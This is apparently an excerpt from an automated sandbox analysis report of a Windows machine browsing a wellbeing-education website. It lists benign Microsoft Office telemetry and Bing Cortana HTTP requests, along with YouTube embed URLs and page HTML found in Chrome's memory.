Source: global traffic HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rp/BaYvmXn0q_Cf4wTJN2K9KdBrfbQ.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: global traffic HTTP traffic detected: GET /rp/BjLNboZeAl9CUzulz_BWYtAs2KI.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=o&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=eb82c8e7c31b4b76bd657e149bcf58ff&ig=65dc22f5bae44905b431c10cc183a3ed HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1747926312x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: 545012EC6AF64F449D402DDDF0620E33x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex
Source: global traffic HTTP traffic detected: GET /apc/trans.gif?b4b2360df62e9cf0666e60a982b91b70 HTTP/1.1host: l-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=on&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=eb82c8e7c31b4b76bd657e149bcf58ff&ig=0638cfbb5a9041079ce3b71fd1168ee9 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1747926312x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: 545012EC6AF64F449D402DDDF0620E33x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: None
Source: global traffic HTTP traffic detected: GET /rp/Cj3ZU8zX_sufjrVdLFel-pJdQTs.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: global traffic HTTP traffic detected: GET /apc/trans.gif?64d45b2e0b5acbfe07e333093de52a06 HTTP/1.1host: l-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic HTTP traffic detected: GET /rp/Dn5Iypmm_cLV_tG2zZt_ZqSWy5o.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: text/html,$Science of THRIVE Approach - YouTubeE=https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2355407453.000028EC03A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355372012.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: text/html,$Welcome to Thrive Learning - YouTubeE=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2400466181.000028EC07EC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Approach to Wellbeing</p><p class=\"tlc-video-iframe\"><iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR\" title=\"YouTube video player\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen=\"\"></iframe></p></div><div class=\"tlc-videos2\"><p>How can you tap into your own Fountain of Health? Watch below:</p><p class=\"tlc-video-iframe\"><iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX\" title=\"YouTube video player\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen=\"\"></iframe></p></div><div class=\"tlc-videos3\"><p><span><strong>Dr. John Chiasson </strong></span>shares evidence and Thrive Learning Centre resources.</p><p class=\"tlc-video-iframe\"><iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws\" title=\"YouTube video player\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen=\"\"></iframe></p></div></div></div></div>\n \n </section>\n\n<section class=\"block block-block-content block-block-contentf966ba8c-fc24-474a-8805-f39f333363d9 clearfix\">\n \n \n\n \n <div class=\"field field--name-body field--type-text-with-summary field--label-hidden field--item\"><div class=\"thrive-apprpach-img\"><p><img src=\"/sites/default/files/inline-images/leaves-banner-2_0_0.jpg\" data-entity-uuid=\"863dde25-bef3-486b-910c-2ecf2d16be0f\" data-entity-type=\"file\" width=\"2185\" height=\"305\"></p></div><div class=\"container tlc-wellbeing\"><div><div class=\"tlc-wellbeing-b2\"><h4>What is the THRIVE 
equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HPX*"https://www.facebook.com/FOHThrive equals www.facebook.com (Facebook)
Source: chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: PX`5-https://www.youtube.com/@fountainofhealth2679 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2489590171.000028EC03E8C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: ","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2489590171.000028EC03E8C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: ","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}e} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: ","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2393613989.000028EC04B35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2352226880.000028EC041A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "auth"||B.details.rc!=="429"?B.errorCode==="ump.spsrejectfailure"&&(h="HTML5_SPS_UMP_STATUS_REJECTED"):(h="TOO_MANY_REQUESTS",W="6");this.iO.jD(B.errorCode,B.severity,h,Q_(B.details),W)}else this.iO.publish("nonfatalerror",B),R=/^pp/.test(this.videoData.clientPlaybackNonce),this.h0(B.errorCode,B.details),R&&B.errorCode==="manifest.net.connect"&&(B="https://www.youtube.com/generate_204?cpn="+this.videoData.clientPlaybackNonce+"&t="+(0,g.f)(),MP(B,"manifest",function(b){z.X=!0;z.OE("pathprobe",b)}, equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: "currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":fal equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 'use strict';var Y='prototype;scheme;push;slice;startsWith;W;Hm6v;split;;length;get;U;=;rr;join;/api/manifest;/initplayback;T;indexOf;set;clone;fvip;path;sp;ug;Untrusted URL;file;Y;fallback_count;toString;match;s;url;signatureCipher;else;youtube.player.web_20250519_22_RC00;n;cmo=;reverse;,(,}/";Tx;/;Pu;local;http://local;smRLl34tByYhJ4B--H-_w8_;fromCharCode;splice;kO;mn;&;unshift;assign;forEach;---;pow;1970-01-01T01:32:36.000+01:30;/videoplayback;pop;ql;https://local;/file/index.m3u8;://;:;index.m3u8;1969-12-31T15:45:03.000-08:15;Nt;r;//;?;1970-01-01T02:45:02.000+02:45;cmo=td;1;www.youtube.com;%3D;1969-12-31T20:15:16.000-03:45;1969-12-31T20:00:04.000-04:00;rr?[1-9].*\\.c\\.youtube\\.com$;replace;,;\\.a1\\.googlevideo\\.com$;playerfallback;cmo=pf;1969-12-31T17:30:53.000-06:30;\\.googlevideo\\.com$;nG;redirector.googlevideo.com;cmo;\u2267/;a1.googlevideo.com;undefined'.split(";"), equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: ( _keyhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: ( http://localhost:64111/tabstatus//www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: ("currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":fal equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: (42783B83FBBChttps://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: (essageHandlerhttps://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2485632326.000028EC0380C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: (f/embedfdomainowww.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: (https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX" equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: (stAnimationFrame(functin(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: (te Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2495235628.000028EC047BC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377119871.000028EC03B70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487353472.000028EC03B73000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: (www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2341110796.000028EC06320000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: .slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2341110796.000028EC06320000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: .slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}kejpgkiemlaofpalmlakkmbjdnl/jquery-3.5.1.min.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2481950611.000028EC033E0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: .www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2505295670.000028EC07AAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504440794.000028EC078DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: .www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2505295670.000028EC07AAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504440794.000028EC078DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: .www.youtube.com_KEY equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2342988019.000028EC063A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 18QIhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: 20QIhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
